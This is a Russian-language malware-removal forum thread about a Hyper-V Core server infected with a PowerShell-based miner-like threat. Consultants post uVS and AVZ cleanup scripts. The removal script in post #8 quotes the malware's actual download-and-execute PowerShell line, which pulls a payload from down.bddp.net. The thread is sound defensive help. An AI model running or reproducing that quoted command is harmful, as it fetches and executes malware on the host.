Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Hyper-v core PowerShell грузит процессор+память

Ответить
Настройки темы
Hyper-v core PowerShell грузит процессор+память

Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Изменения
Автор: TimofeevAGVN53
Дата: 06-11-2019
На виртуалке не снять лог по правилам. Сделал как рекомендовали в этой теме - http://forum.oszone.net/thread-342410.html

Отправлено: 16:45, 03-11-2019

 

Аватара для akok

Ветеран


Консультант


Сообщения: 764
Благодарности: 202

Профиль | Сайт | Отправить PM | Цитировать


Доброго дня. Что за виртуалка и почему не удалось собрать логи? Откат точки не рассматриваете?

-------


Отправлено: 17:14, 03-11-2019 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Точнее это не виртуалка, а сам хост сервер - Hyper-v core.
Лог не удаётся собрать потому что пишет что подключен по РДП. Откат не рассматривал.

Отправлено: 22:50, 03-11-2019 | #3


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5296
Благодарности: 1328

Профиль | Отправить PM | Цитировать


Цитата TimofeevAGVN53:
пишет что подключен по РДП »
Да, логи нужно снимать непосредственно на сервере, а не через терминальное подключение.
Кстати, пароли на RDP смените.
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код: Выделить весь код
    ;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv6.3
    v400c
    ;---------command-block---------
    deltsk %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
    apply
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную.
Подробнее читайте в этом руководстве.


Проверьте уязвимые места:
Выполните скрипт в AVZ при наличии доступа в интернет:

Код: Выделить весь код
var
LogPath : string;
ScriptPath : string;
begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';
  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else 
begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) 
else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.
В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

-------


Отправлено: 11:52, 04-11-2019 | #4


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Спасибо.
1) Почему нужно менять пароль RDP?
2) Когда первый скрипт выполнен он выдаст какое то сообщение?
3) Второй скрипт сообщил что ни каких уязвимостей нет.
4) Выполнил первый скрипт через некоторое время опять процессы powershell - скриншот во вложении

Последний раз редактировалось TimofeevAGVN53, 06-11-2019 в 15:54.


Отправлено: 09:44, 05-11-2019 | #5


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5296
Благодарности: 1328

Профиль | Отправить PM | Цитировать


Цитата TimofeevAGVN53:
Почему нужно менять пароль RDP? »
Не исключено, что проникновение вредоноса происходит через взломанный пароль.

Цитата TimofeevAGVN53:
Когда первый скрипт выполнен он выдаст какое то сообщение? »
Нет.

Цитата TimofeevAGVN53:
через некоторое время опять процессы powershell »
Соберите свежий образ автозапуска uVS.

-------


Отправлено: 09:51, 05-11-2019 | #6


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Раньше CureIt видел вирусную задачу, сейчас не видит.
Лог во вложении.

Последний раз редактировалось TimofeevAGVN53, 06-11-2019 в 15:54.


Отправлено: 10:09, 05-11-2019 | #7


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5296
Благодарности: 1328

Профиль | Отправить PM | Цитировать


  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код: Выделить весь код
    ;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv6.3
    v400c
    ;---------command-block---------
    delref IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://DOWN.BDDP.NET/NEWOL.DAT?ALLV6&MAC=&AV=&VERSION=6.3.9600&BIT=64-BIT&FLAG2=TRUE&DOMAIN=HARD.NOV&USER=HPV9$&PS=TRUE')
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\C94D3D10-F112B2E2-596AD9FA-E298B03A\150968B4D.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\6267A36F-6CDFBD31-39CB72-2B244C2F\259D075B19.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\AA44598C-D124EA12-25B37650-C44382F9\3B1A5F71A35.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\E3B9B7B4-32056DB4-4A0C5244-4FB3A0DC\8ED1CEBB1B.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\8EF1EB8017.SYS
    delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\13ECE9FC-627FA9C8-8762782E-E41DE93C\C94D31C4.SYS
    delref 752073A1-23F2-4396-85F0-8FDB879ED0ED\[CLSID]
    apply
    
    deltmp
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перегрузите компьютер вручную.
Подробнее читайте в этом руководстве.

Соберите еще раз образ автозапуска uVS (AutorunsVTChecker уже не нужно запускать).

-------


Отправлено: 10:41, 05-11-2019 | #8


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Вложения
Тип файла: 7z HPV9_2019-11-05_12-17-25_v4.1.8.7z
(247.6 Kb, 1 просмотров)

Спасибо.
Во вложении.

Отправлено: 12:23, 05-11-2019 | #9


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5296
Благодарности: 1328

Профиль | Отправить PM | Цитировать


Лог выглядит хорошо. Проблема решена?

-------


Отправлено: 12:26, 05-11-2019 | #10



Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Hyper-v core PowerShell грузит процессор+память

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Powershell грузить процессор + память. TimofeevAGVN53 Лечение систем от вредоносных программ 11 03-11-2019 22:53
[решено] Powershell.exe грузит процессор Vilgon Лечение систем от вредоносных программ 7 26-03-2019 12:20
Разное - [решено] Powershell.exe грузит процессор Vilgon Microsoft Windows 7 2 25-03-2019 15:42
2012 - Hyper-V и powershell krec Windows Server 2012/2012 R2 17 09-05-2017 21:16
Процессор Core i7 620M заменит устаревший Core 2 Duo P9700 OSZone News Новости железа 0 04-01-2010 17:30




 
Переход